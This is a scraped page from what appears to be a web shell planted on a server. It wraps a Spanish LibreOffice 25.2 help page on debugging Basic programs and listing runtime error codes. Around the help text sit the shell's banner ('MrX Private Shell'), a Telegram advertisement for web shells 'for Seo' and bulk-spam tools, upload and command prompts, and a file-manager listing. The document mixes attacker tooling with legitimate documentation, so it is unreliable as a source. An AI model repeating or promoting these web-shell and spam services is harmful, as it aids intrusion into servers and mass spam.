__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<!DOCTYPE html>
<html lang="es" dir="ltr">
<head>
<base href="../../../../">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Depuración de un programa Basic</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="es/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="es/bookmarks.js" defer></script><script type="text/javascript" src="es/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="es/text/shared/05/new_help.html"><div></div></a><a class="logo" href="es/text/shared/05/new_help.html"><p dir="auto">Ayuda de LibreOffice 25.2</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Módulo</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contenido</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Buscar en los marcadores del módulo elegido" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">
<noscript><div id="WarnJS"><h1 dir="auto">Active JavaScript en el navegador para mostrar las páginas de ayuda de LibreOffice.</h1></div></noscript>
<a id="basicdebugging"></a>
<a id="bm_id3153344"></a><meta itemprop="keywords" content="depurar programas en BASIC">
<meta itemprop="keywords" content="variables, observar valores">
<meta itemprop="keywords" content="observar variables">
<meta itemprop="keywords" content="errores en tiempo de ejecución en BASIC">
<meta itemprop="keywords" content="códigos de errores en BASIC">
<meta itemprop="keywords" content="puntos de interrupción">
<meta itemprop="keywords" content="ventana de la pila de llamadas">
<h1 id="hd_id3153344" dir="auto">Depuración de un programa Basic</h1>

<h2 id="hd_id3159224" dir="auto">Puntos de interrupción y ejecución paso a paso</h2>
<p id="par_id3150682" class="paragraph" dir="auto">Con la ejecución de paso único puede comprobarse que no haya errores en ningún renglón del programa Basic. Los errores se pueden rastrear fácilmente ya que los resultados de cada paso pueden verse inmediatamente. Un puntero en la columna de puntos de interrupción del editor indica cuál es el renglón actual. También puede establecer puntos de interrupción si desea forzar la interrupción del programa en una posición específica.</p>
<p id="par_id3147303" class="paragraph" dir="auto">Pulse dos veces en la columna <span class="emph">punto de interrupción</span> a la izquierda de la ventana del editor para insertar o quitar un punto de interrupción en la línea correspondiente. Cuando el programa llega a un punto de interrupción, se detiene su ejecución.</p>
<p id="par_id3155805" class="paragraph" dir="auto">La ejecución <span class="emph">paso a paso</span> mediante el icono <span class="emph">Paso único</span> hace que el programa se ramifique en procedimientos y funciones.</p>
<p id="par_id3151110" class="paragraph" dir="auto">La ejecución mediante el icono de <span class="emph">Paso a paso</span> hace que el programa considere los procedimientos y funciones como un único paso y los salte.</p>
<h3 id="hd_id3153825" dir="auto">Propiedades de un punto de interrupción</h3>
<p id="par_id3147574" class="paragraph" dir="auto">Las propiedades de un punto de interrupción están disponibles a través de su menú contextual, que se abre al pulsar con el botón secundario del ratón en el punto respectivo, en la columna de puntos de interrupción.</p>
<p id="par_id3148473" class="paragraph" dir="auto">Los puntos de interrupción pueden <span class="emph">activarse</span> y <span class="emph">desactivarse</span> mediante la opción <span class="emph">Activo</span> del menú contextual. Cuando se desactiva un punto de interrupción, no se detiene la ejecución del programa.</p>
<p id="par_id3159413" class="paragraph" dir="auto">Para que se muestre el cuadro de diálogo <span class="emph">Puntos de interrupción</span> donde especificar otras opciones, seleccione <span class="emph">Propiedades</span> desde el menú contextual de un punto de interrupción, o bien, seleccione <span class="emph">Puntos de interrupción</span> desde el menú contextual de la columna de puntos de interrupción.</p>
<p id="par_id3156280" class="paragraph" dir="auto">La lista muestra todos los <span class="emph">puntos de ruptura</span> con el número de línea correspondiente en el código fuente. Los puntos de ruptura seleccionados pueden activarse o desactivarse marcando o desmarcando la casilla <span class="emph">Activo</span>.</p>
<p id="par_id3158407" class="paragraph" dir="auto">La opción <span class="emph">Recuento de pasadas</span> especifica el número de veces que puede pasarse sobre el punto de interrupción antes de que el programa se detenga. Si se escribe 0 (el valor predeterminado) el programa siempre se detiene en cuanto encuentra un punto de interrupción.</p>
<p id="par_id3153968" class="paragraph" dir="auto">Pulse en <span class="emph">Eliminar</span> para quitar el punto de interrupción del programa.</p>
<h2 id="hd_id3150439" dir="auto">Supervisión del valor de las variables</h2>
<p id="par_id3153368" class="paragraph" dir="auto">Los valores de una variable pueden monitorizarse al añadirla a la ventana <span class="emph">Inspección</span>. Para agregar una variable a la lista de variables monitorizadas, escriba su nombre en el cuadro de texto <span class="emph">Inspección</span> y oprima Intro.</p>
<p id="par_id3146986" class="paragraph" dir="auto">Los valores de las variables se muestran solo si forman parte del ámbito. Las variables que no estén definidas en la ubicación actual del código fuente muestran la indicación «Out of Scope» (‘fuera del ámbito’) en vez de un valor.</p>
<p id="par_id3145272" class="paragraph" dir="auto">En la ventana Inspección también pueden incluirse matrices. Si se escribe el nombre de una matriz sin un valor de índice en el cuadro de texto Inspección, se muestra el contenido de toda la matriz.</p>
<div class="tip">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/tip.svg" alt="Icono de consejo" style="width:40px;height:40px;"></div>
<div class="notetext"><p dir="auto">Si acerca el ratón sobre una variable predefinida en el Editor durante el tiempo de ejecución, el contenido de la variable se muestra en un cuadro emergente.</p></div>
</div>
<br><h2 id="hd_id3148618" dir="auto">Utilización de la ventana Pila de llamada</h2>
<p id="par_id3154491" class="paragraph" dir="auto"><span class="avis">Proporciona un resumen de la jerarquía de llamada de procedimientos y funciones.</span> Puede determinarse qué procedimientos y funciones llamaron a qué otros procedimientos y funciones en el punto actual del código fuente.</p>
<h2 id="hd_id3150594" dir="auto">Error en tiempo de ejecución</h2>
<div class="embedded">
<a id="allerrors"></a>
<p id="par_id315509599" class="paragraph" dir="auto"><a id="err1"></a>1 Interrupción de usuario</p>
<p id="par_id3155095" class="paragraph" dir="auto"><a id="err2"></a>2 Error de sintaxis no especificado</p>
<p id="par_id3149126" class="paragraph" dir="auto"><a id="err3"></a>3 Return sin Gosub</p>
<p id="par_id3153976" class="paragraph" dir="auto"><a id="err4"></a>4 Parámetro no válido</p>
<p id="par_id3150891" class="paragraph" dir="auto"><a id="err5"></a>5 Llamada a procedimiento no válida</p>
<p id="par_id3159227" class="paragraph" dir="auto"><a id="err6"></a>6 Desbordamiento</p>
<p id="par_id3154649" class="paragraph" dir="auto"><a id="err7"></a>7 Memoria agotada</p>
<p id="par_id3150050" class="paragraph" dir="auto"><a id="err8"></a>8 Matriz ya dimensionada</p>
<p id="par_id3148900" class="paragraph" dir="auto"><a id="err9"></a>9 El índice está fuera del intervalo definido</p>
<p id="par_id3153806" class="paragraph" dir="auto"><a id="err10"></a>10 Definición duplicada</p>
<p id="par_id3146963" class="paragraph" dir="auto"><a id="err11"></a>11 División por cero</p>
<p id="par_id3153013" class="paragraph" dir="auto"><a id="err12"></a>12 Variable no definida </p>
<p id="par_id3155593" class="paragraph" dir="auto"><a id="err13"></a>13 Discordancia de tipo</p>
<p id="par_id3151197" class="paragraph" dir="auto"><a id="err14"></a>14 Parámetro no válido</p>
<p id="par_id3154710" class="paragraph" dir="auto"><a id="err18"></a>18 Proceso interrumpido por el usuario</p>
<p id="par_id3147504" class="paragraph" dir="auto"><a id="err20"></a>20 Continuar sin error</p>
<p id="par_id3145319" class="paragraph" dir="auto"><a id="err28"></a>28 No hay suficiente memoria de pila disponible</p>
<p id="par_id3146110" class="paragraph" dir="auto"><a id="err35"></a>35 Subfunción o función no definida</p>
<p id="par_id3147246" class="paragraph" dir="auto"><a id="err48"></a>48 Error al cargar archivo DLL</p>
<p id="par_id3146101" class="paragraph" dir="auto"><a id="err49"></a>49 Convención de llamada a DLL incorrecta</p>
<p id="par_id3153957" class="paragraph" dir="auto"><a id="err51"></a>51 Error interno</p>
<p id="par_id3154404" class="paragraph" dir="auto"><a id="err52"></a>52 Nombre de archivo o número incorrectos</p>
<p id="par_id3151338" class="paragraph" dir="auto"><a id="err53"></a>53 Archivo no encontrado</p>
<p id="par_id3147298" class="paragraph" dir="auto"><a id="err54"></a>54 Modo de archivo incorrecto</p>
<p id="par_id3148747" class="paragraph" dir="auto"><a id="err55"></a>55 Archivo ya abierto</p>
<p id="par_id3145233" class="paragraph" dir="auto"><a id="err57"></a>57 Error de E/S de dispositivo</p>
<p id="par_id3156399" class="paragraph" dir="auto"><a id="err58"></a>58 Archivo ya existente</p>
<p id="par_id3149324" class="paragraph" dir="auto"><a id="err59"></a>59 Longitud de registro incorrecta</p>
<p id="par_id3147409" class="paragraph" dir="auto"><a id="err61"></a>61 Disco lleno</p>
<p id="par_id3149146" class="paragraph" dir="auto"><a id="err62"></a>62 Demasiados archivos</p>
<p id="par_id3150456" class="paragraph" dir="auto"><a id="err63"></a>63 Número de registro incorrecto</p>
<p id="par_id3146883" class="paragraph" dir="auto"><a id="err67"></a>67 Demasiados archivos</p>
<p id="par_id3146818" class="paragraph" dir="auto"><a id="err68"></a>68 Dispositivo no disponible</p>
<p id="par_id3145225" class="paragraph" dir="auto"><a id="err70"></a>70 Acceso denegado</p>
<p id="par_id3150372" class="paragraph" dir="auto"><a id="err71"></a>71 Disco no preparado</p>
<p id="par_id3148894" class="paragraph" dir="auto"><a id="err73"></a>73 No implementado</p>
<p id="par_id3152981" class="paragraph" dir="auto"><a id="err74"></a>74 Imposible cambiar nombre con unidad distinta</p>
<p id="par_id3149355" class="paragraph" dir="auto"><a id="err75"></a>75 Error de acceso a ruta/archivo</p>
<p id="par_id3150477" class="paragraph" dir="auto"><a id="err76"></a>76 Ruta no encontrada</p>
<p id="par_id3154678" class="paragraph" dir="auto"><a id="err91"></a>91 Variable de objeto no definida</p>
<p id="par_id3149890" class="paragraph" dir="auto"><a id="err93"></a>93 Pauta de cadena no válida</p>
<p id="par_id3146942" class="paragraph" dir="auto"><a id="err94"></a>94 No se permite utilizar cero</p>
<p id="par_id31469429" class="paragraph" dir="auto"><a id="err250"></a>250 Error DDE</p>
<p id="par_id31469428" class="paragraph" dir="auto"><a id="err280"></a>280 Esperando respuesta de la conexión DDE</p>
<p id="par_id31469427" class="paragraph" dir="auto"><a id="err281"></a>281 Canales DDE no disponibles</p>
<p id="par_id31469426" class="paragraph" dir="auto"><a id="err282"></a>282 No respondió la aplicación al inicio de conexión DDE</p>
<p id="par_id31469425" class="paragraph" dir="auto"><a id="err283"></a>283 Demasiadas aplicaciones respondieron a la iniciación de conexión DDE</p>
<p id="par_id31469424" class="paragraph" dir="auto"><a id="err284"></a>284 Canal DDE bloqueado</p>
<p id="par_id31469423" class="paragraph" dir="auto"><a id="err285"></a>285 Una aplicación externa no puede ejecutar una operación DDE</p>
<p id="par_id31469422" class="paragraph" dir="auto"><a id="err286"></a>286 Se agotó el tiempo de espera para respuesta de DDE</p>
<p id="par_id31469421" class="paragraph" dir="auto"><a id="err287"></a>287 El usuario presionó ESCAPE durante una operación de DDE</p>
<p id="par_id31469420" class="paragraph" dir="auto"><a id="err288"></a>288 Aplicación externa ocupada</p>
<p id="par_id31469419" class="paragraph" dir="auto"><a id="err289"></a>289 Operación de DDE sin datos</p>
<p id="par_id31469418" class="paragraph" dir="auto"><a id="err290"></a>290 Los datos están en el formato equivocado</p>
<p id="par_id31469417" class="paragraph" dir="auto"><a id="err291"></a>291 La aplicación externa ha sido finalizada</p>
<p id="par_id31469416" class="paragraph" dir="auto"><a id="err292"></a>292 Conexión DDE interrumpida o modificada</p>
<p id="par_id31469415" class="paragraph" dir="auto"><a id="err293"></a>293 Método DDE invocado sin un canal abierto</p>
<p id="par_id31469414" class="paragraph" dir="auto"><a id="err294"></a>294 Formato de enlace DDE no válido</p>
<p id="par_id31469413" class="paragraph" dir="auto"><a id="err295"></a>295 Se perdió el mensaje DDE</p>
<p id="par_id31469412" class="paragraph" dir="auto"><a id="err296"></a>296 Ya se realizó el pegado del enlace</p>
<p id="par_id31469411" class="paragraph" dir="auto"><a id="err297"></a>297 No se puede definir el modo de enlace debido a un enlace a tema no válido</p>
<p id="par_id31469410" class="paragraph" dir="auto"><a id="err298"></a>298 DDE requiere el archivo DDEML.DLL</p>
<p id="par_id3150028" class="paragraph" dir="auto"><a id="err323"></a>323 No se puede cargar el módulo; el formato no es válido</p>
<p id="par_id3148434" class="paragraph" dir="auto"><a id="err341"></a>341 Índice de objeto no válido</p>
<p id="par_id3143219" class="paragraph" dir="auto"><a id="err366"></a>366 El objeto no está disponible</p>
<p id="par_id3144744" class="paragraph" dir="auto"><a id="err380"></a>380 Valor de propiedad incorrecto</p>
<p id="par_id3147420" class="paragraph" dir="auto"><a id="err382"></a>382 Esta propiedad es de solo lectura</p>
<p id="par_id3147472" class="paragraph" dir="auto"><a id="err394"></a>394 Esta propiedad es de solo escritura</p>
<p id="par_id3148583" class="paragraph" dir="auto"><a id="err420"></a>420 Referencia a objeto no válida</p>
<p id="par_id3153329" class="paragraph" dir="auto"><a id="err423"></a>423 Propiedad o método no encontrado</p>
<p id="par_id3148738" class="paragraph" dir="auto"><a id="err424"></a>424 Objeto requerido</p>
<p id="par_id3159084" class="paragraph" dir="auto"><a id="err425"></a>425 Uso de objeto no válido</p>
<p id="par_id3146806" class="paragraph" dir="auto"><a id="err430"></a>430 La automatización OLE no es compatible con este objeto</p>
<p id="par_id3146130" class="paragraph" dir="auto"><a id="err438"></a>438 Esta propiedad o método no es compatible con el objeto</p>
<p id="par_id3154374" class="paragraph" dir="auto"><a id="err440"></a>440 Error de automatización OLE</p>
<p id="par_id3149685" class="paragraph" dir="auto"><a id="err445"></a>445 El objeto no admite esta acción</p>
<p id="par_id3150282" class="paragraph" dir="auto"><a id="err446"></a>446 El objeto indicado no admite los argumentos con nombre</p>
<p id="par_id3150142" class="paragraph" dir="auto"><a id="err447"></a>447 El objeto indicado no se admite en la configuración regional actual</p>
<p id="par_id3152771" class="paragraph" dir="auto"><a id="err448"></a>448 No se encontró el argumento con nombre</p>
<p id="par_id3145145" class="paragraph" dir="auto"><a id="err449"></a>449 El argumento no es opcional</p>
<p id="par_id3154399" class="paragraph" dir="auto"><a id="err450"></a>450 El número de argumentos no es válido</p>
<p id="par_id3146137" class="paragraph" dir="auto"><a id="err451"></a>451 El objeto no es una lista</p>
<p id="par_id3149507" class="paragraph" dir="auto"><a id="err452"></a>452 El número ordinal no es válido</p>
<p id="par_id3154566" class="paragraph" dir="auto"><a id="err453"></a>453 No se encontró la función DLL especificada</p>
<p id="par_id3145595" class="paragraph" dir="auto"><a id="err460"></a>460 Formato de portapapeles no válido</p>
<p id="par_id31455951" class="paragraph" dir="auto"><a id="err951"></a>951 Símbolo inesperado:</p>
<p id="par_id31455952" class="paragraph" dir="auto"><a id="err952"></a>952 Se esperaba:</p>
<p id="par_id31455953" class="paragraph" dir="auto"><a id="err953"></a>953 Se esperaba un símbolo</p>
<p id="par_id31455954" class="paragraph" dir="auto"><a id="err954"></a>954 Se esperaba una variable</p>
<p id="par_id31455955" class="paragraph" dir="auto"><a id="err955"></a>955 Se esperaba una etiqueta</p>
<p id="par_id31455956" class="paragraph" dir="auto"><a id="err956"></a>956 No se puede aplicar el valor</p>
<p id="par_id31455957" class="paragraph" dir="auto"><a id="err957"></a>957 Ya se definió la variable</p>
<p id="par_id31455958" class="paragraph" dir="auto"><a id="err958"></a>958 El subprocedimiento o la función ya se definieron</p>
<p id="par_id31455959" class="paragraph" dir="auto"><a id="err959"></a>959 Ya se definió la etiqueta</p>
<p id="par_id31455960" class="paragraph" dir="auto"><a id="err960"></a>960 No se encontró la variable</p>
<p id="par_id31455961" class="paragraph" dir="auto"><a id="err961"></a>961 No se encontró la matriz o el procedimiento</p>
<p id="par_id31455962" class="paragraph" dir="auto"><a id="err962"></a>962 No se encontró el procedimiento</p>
<p id="par_id31455963" class="paragraph" dir="auto"><a id="err963"></a>963 No se definió la etiqueta</p>
<p id="par_id31455964" class="paragraph" dir="auto"><a id="err964"></a>964 Tipo de datos desconocido</p>
<p id="par_id31455965" class="paragraph" dir="auto"><a id="err965"></a>965 Se esperaba una salida</p>
<p id="par_id31455966" class="paragraph" dir="auto"><a id="err966"></a>966 El bloque de instrucciones sigue abierto: falta</p>
<p id="par_id31455967" class="paragraph" dir="auto"><a id="err967"></a>967 Los paréntesis no coinciden</p>
<p id="par_id31455968" class="paragraph" dir="auto"><a id="err968"></a>968 Ya se definió el símbolo de manera diferente</p>
<p id="par_id31455969" class="paragraph" dir="auto"><a id="err969"></a>969 Los parámetros no corresponden con el procedimiento</p>
<p id="par_id31455970" class="paragraph" dir="auto"><a id="err970"></a>970 Carácter no válido en el número</p>
<p id="par_id31455971" class="paragraph" dir="auto"><a id="err971"></a>971 Debe dimensionar la matriz</p>
<p id="par_id31455972" class="paragraph" dir="auto"><a id="err972"></a>972 Else/Endif sin If</p>
<p id="par_id31455973" class="paragraph" dir="auto"><a id="err973"></a>973 no se permite dentro de un procedimiento</p>
<p id="par_id31455974" class="paragraph" dir="auto"><a id="err974"></a>974 no se permite fuera de un procedimiento</p>
<p id="par_id31455975" class="paragraph" dir="auto"><a id="err975"></a>975 Las dimensiones especificadas no coinciden</p>
<p id="par_id31455976" class="paragraph" dir="auto"><a id="err976"></a>976 Opción desconocida:</p>
<p id="par_id31455977" class="paragraph" dir="auto"><a id="err977"></a>977 Constante redefinida</p>
<p id="par_id31455978" class="paragraph" dir="auto"><a id="err978"></a>978 El programa es demasiado grande</p>
<p id="par_id31455979" class="paragraph" dir="auto"><a id="err979"></a>979 No se permiten las cadenas o las matrices</p>
<p id="par_id31455980" class="paragraph" dir="auto"><a id="err1000"></a>1000 El objeto no tiene esta propiedad</p>
<p id="par_id31455981" class="paragraph" dir="auto"><a id="err1001"></a>1001 El objeto no tiene este método</p>
<p id="par_id31455982" class="paragraph" dir="auto"><a id="err1002"></a>1002 Falta el argumento requerido</p>
<p id="par_id31455983" class="paragraph" dir="auto"><a id="err1003"></a>1003 Número de argumentos no válido</p>
<p id="par_id31455984" class="paragraph" dir="auto"><a id="err1004"></a>1004 Error al ejecutar un método</p>
<p id="par_id31455985" class="paragraph" dir="auto"><a id="err1005"></a>1005 No se pudo establecer la propiedad</p>
<p id="par_id31455986" class="paragraph" dir="auto"><a id="err1006"></a>1006 No se pudo determinar la propiedad</p>
</div>
</div>
<div id="DonationFrame"></div>
<footer><h2 style="text-align: center;"><a href="https://books.libreoffice.org" target="_blank">Libros de LibreOffice</a></h2>
<div class="noteicon" dir="auto" style="display:flex;justify-content:center;flex-wrap:wrap;row-gap:15px;">
<img src="media/navigation/libo-writer.svg" alt="Writer Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-calc.svg" alt="Calc Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-impress.svg" alt="Impress Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-draw.svg" alt="Draw Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-base.svg" alt="Base Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-math.svg" alt="Math Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-symbol-black.svg" alt="Getting Started Icon" style="width:60px;height:60px;">
</div>
<div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/sbasic/shared/01030300.xhp" target="_blank">/text/sbasic/shared/01030300.xhp</a></p>
<p dir="auto">Title is: Depuración de un programa Basic</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>

Filemanager

Name Type Size Permission Actions
01 Folder 0755
02 Folder 0755
03 Folder 0755
00000002.html File 8.56 KB 0644
00000003.html File 28.14 KB 0644
01000000.html File 5.48 KB 0644
01010210.html File 7.54 KB 0644
01020000.html File 5.39 KB 0644
01020100.html File 29.21 KB 0644
01020200.html File 4.78 KB 0644
01020300.html File 19.46 KB 0644
01020500.html File 5.77 KB 0644
01030000.html File 5.17 KB 0644
01030100.html File 5.25 KB 0644
01030200.html File 10.6 KB 0644
01030300.html File 22.3 KB 0644
01030400.html File 21.46 KB 0644
01040000.html File 29.11 KB 0644
01050000.html File 8.94 KB 0644
01050100.html File 5.34 KB 0644
01050200.html File 4.15 KB 0644
01050300.html File 5.2 KB 0644
01170100.html File 7.26 KB 0644
01170101.html File 31.62 KB 0644
01170103.html File 6.87 KB 0644
03000000.html File 8.61 KB 0644
03010000.html File 5 KB 0644
03010100.html File 4.58 KB 0644
03010102.html File 16.46 KB 0644
03010103.html File 9.97 KB 0644
03010200.html File 4.31 KB 0644
03010201.html File 7.04 KB 0644
03010300.html File 5.87 KB 0644
03010301.html File 6.98 KB 0644
03010302.html File 6.4 KB 0644
03010303.html File 6.96 KB 0644
03010304.html File 7.13 KB 0644
03010305.html File 7.54 KB 0644
03010306.html File 7.17 KB 0644
03020000.html File 6.28 KB 0644
03020100.html File 5.06 KB 0644
03020101.html File 7.72 KB 0644
03020102.html File 8.16 KB 0644
03020103.html File 11.08 KB 0644
03020104.html File 6.19 KB 0644
03020200.html File 6.38 KB 0644
03020201.html File 9.18 KB 0644
03020202.html File 8.46 KB 0644
03020203.html File 8.38 KB 0644
03020204.html File 9.91 KB 0644
03020205.html File 8.89 KB 0644
03020301.html File 8.49 KB 0644
03020302.html File 5.38 KB 0644
03020303.html File 8.97 KB 0644
03020304.html File 5.15 KB 0644
03020305.html File 6.41 KB 0644
03020400.html File 9.18 KB 0644
03020401.html File 7.89 KB 0644
03020402.html File 8.11 KB 0644
03020403.html File 8.64 KB 0644
03020404.html File 8.78 KB 0644
03020405.html File 8.38 KB 0644
03020406.html File 5.93 KB 0644
03020407.html File 6.64 KB 0644
03020408.html File 6.43 KB 0644
03020409.html File 9.93 KB 0644
03020410.html File 5.85 KB 0644
03020411.html File 7.44 KB 0644
03020412.html File 5.19 KB 0644
03020413.html File 6.59 KB 0644
03020414.html File 8.25 KB 0644
03020415.html File 5.47 KB 0644
03030000.html File 5.79 KB 0644
03030100.html File 12.41 KB 0644
03030101.html File 7.33 KB 0644
03030102.html File 7.36 KB 0644
03030103.html File 6.02 KB 0644
03030104.html File 5.92 KB 0644
03030105.html File 13.53 KB 0644
03030106.html File 5.79 KB 0644
03030107.html File 6.04 KB 0644
03030108.html File 7.58 KB 0644
03030110.html File 9.82 KB 0644
03030111.html File 5.25 KB 0644
03030112.html File 5.26 KB 0644
03030113.html File 5.27 KB 0644
03030114.html File 5.26 KB 0644
03030115.html File 5.27 KB 0644
03030116.html File 5.26 KB 0644
03030120.html File 13.98 KB 0644
03030130.html File 14.14 KB 0644
03030200.html File 7.17 KB 0644
03030201.html File 5.83 KB 0644
03030202.html File 6.35 KB 0644
03030203.html File 5.94 KB 0644
03030204.html File 5.78 KB 0644
03030205.html File 7.7 KB 0644
03030206.html File 6.86 KB 0644
03030300.html File 5.12 KB 0644
03030301.html File 4.76 KB 0644
03030302.html File 4.78 KB 0644
03030303.html File 6.61 KB 0644
03040000.html File 62.7 KB 0644
03050000.html File 7.41 KB 0644
03050100.html File 5.85 KB 0644
03050200.html File 5.73 KB 0644
03050300.html File 18.68 KB 0644
03050500.html File 7.3 KB 0644
03060000.html File 6.3 KB 0644
03060100.html File 6 KB 0644
03060200.html File 5.76 KB 0644
03060300.html File 5.77 KB 0644
03060400.html File 5.49 KB 0644
03060500.html File 5.65 KB 0644
03060600.html File 5.75 KB 0644
03070000.html File 6.32 KB 0644
03070100.html File 5.13 KB 0644
03070200.html File 5.15 KB 0644
03070300.html File 5.14 KB 0644
03070400.html File 5.11 KB 0644
03070500.html File 5.22 KB 0644
03070600.html File 8.15 KB 0644
03070700.html File 6.06 KB 0644
03080000.html File 6.58 KB 0644
03080100.html File 5.2 KB 0644
03080101.html File 8.01 KB 0644
03080102.html File 7.44 KB 0644
03080103.html File 7.53 KB 0644
03080104.html File 7.54 KB 0644
03080200.html File 4.51 KB 0644
03080201.html File 5.63 KB 0644
03080202.html File 6.04 KB 0644
03080300.html File 4.5 KB 0644
03080301.html File 7.13 KB 0644
03080302.html File 6.41 KB 0644
03080400.html File 4.14 KB 0644
03080401.html File 5.36 KB 0644
03080500.html File 4.74 KB 0644
03080501.html File 5.8 KB 0644
03080502.html File 5.73 KB 0644
03080503.html File 5.89 KB 0644
03080600.html File 4.11 KB 0644
03080601.html File 5.67 KB 0644
03080700.html File 4.21 KB 0644
03080701.html File 6.43 KB 0644
03080800.html File 4.44 KB 0644
03080801.html File 5.64 KB 0644
03080802.html File 5.11 KB 0644
03090000.html File 5.62 KB 0644
03090100.html File 4.91 KB 0644
03090101.html File 9.45 KB 0644
03090102.html File 7.14 KB 0644
03090103.html File 6.99 KB 0644
03090200.html File 5.38 KB 0644
03090201.html File 8.97 KB 0644
03090202.html File 11.1 KB 0644
03090203.html File 7.13 KB 0644
03090300.html File 5.14 KB 0644
03090301.html File 8.02 KB 0644
03090302.html File 6.43 KB 0644
03090303.html File 7.41 KB 0644
03090400.html File 8.39 KB 0644
03090401.html File 7.34 KB 0644
03090402.html File 7.68 KB 0644
03090403.html File 6.66 KB 0644
03090404.html File 6.22 KB 0644
03090405.html File 5.69 KB 0644
03090406.html File 12.67 KB 0644
03090407.html File 5.87 KB 0644
03090408.html File 5.03 KB 0644
03090409.html File 11.78 KB 0644
03090410.html File 6.79 KB 0644
03090411.html File 5.79 KB 0644
03090412.html File 7.81 KB 0644
03090413.html File 10.12 KB 0644
03100000.html File 21.74 KB 0644
03100050.html File 7.24 KB 0644
03100060.html File 6.07 KB 0644
03100070.html File 4.57 KB 0644
03100080.html File 5.05 KB 0644
03100100.html File 9.71 KB 0644
03100300.html File 7.93 KB 0644
03100400.html File 8.12 KB 0644
03100500.html File 10.58 KB 0644
03100600.html File 8.34 KB 0644
03100700.html File 7.41 KB 0644
03100900.html File 7.93 KB 0644
03101000.html File 8.61 KB 0644
03101100.html File 6.38 KB 0644
03101110.html File 6.42 KB 0644
03101120.html File 6.33 KB 0644
03101130.html File 6.4 KB 0644
03101140.html File 6.41 KB 0644
03101300.html File 6.44 KB 0644
03101400.html File 6.41 KB 0644
03101500.html File 6.4 KB 0644
03101600.html File 6.4 KB 0644
03101700.html File 6.38 KB 0644
03102000.html File 6.43 KB 0644
03102100.html File 15.27 KB 0644
03102101.html File 13.49 KB 0644
03102200.html File 5.34 KB 0644
03102300.html File 5.5 KB 0644
03102400.html File 5.34 KB 0644
03102450.html File 5.08 KB 0644
03102600.html File 5.5 KB 0644
03102700.html File 5.39 KB 0644
03102800.html File 8.09 KB 0644
03102900.html File 6.3 KB 0644
03103000.html File 6.23 KB 0644
03103100.html File 5.47 KB 0644
03103200.html File 5.09 KB 0644
03103300.html File 5.65 KB 0644
03103350.html File 7.51 KB 0644
03103400.html File 4.9 KB 0644
03103450.html File 4.91 KB 0644
03103500.html File 5.79 KB 0644
03103600.html File 17 KB 0644
03103700.html File 7.13 KB 0644
03103800.html File 6.25 KB 0644
03103900.html File 6.79 KB 0644
03104000.html File 5.11 KB 0644
03104100.html File 5.13 KB 0644
03104200.html File 5.84 KB 0644
03104300.html File 5.43 KB 0644
03104400.html File 5.4 KB 0644
03104500.html File 5.45 KB 0644
03104600.html File 6.77 KB 0644
03104700.html File 6.36 KB 0644
03110100.html File 7.28 KB 0644
03120000.html File 5.32 KB 0644
03120100.html File 6.86 KB 0644
03120101.html File 6.72 KB 0644
03120102.html File 7.95 KB 0644
03120103.html File 8.43 KB 0644
03120104.html File 6.93 KB 0644
03120105.html File 7.23 KB 0644
03120111.html File 7.15 KB 0644
03120112.html File 7.33 KB 0644
03120200.html File 4.55 KB 0644
03120201.html File 5.99 KB 0644
03120202.html File 6.08 KB 0644
03120300.html File 9.27 KB 0644
03120301.html File 14.89 KB 0644
03120302.html File 5.8 KB 0644
03120303.html File 6.62 KB 0644
03120304.html File 7.21 KB 0644
03120305.html File 6.33 KB 0644
03120306.html File 7.81 KB 0644
03120307.html File 6.76 KB 0644
03120308.html File 7.39 KB 0644
03120309.html File 6.31 KB 0644
03120310.html File 5.8 KB 0644
03120311.html File 6.18 KB 0644
03120312.html File 5.94 KB 0644
03120313.html File 5.98 KB 0644
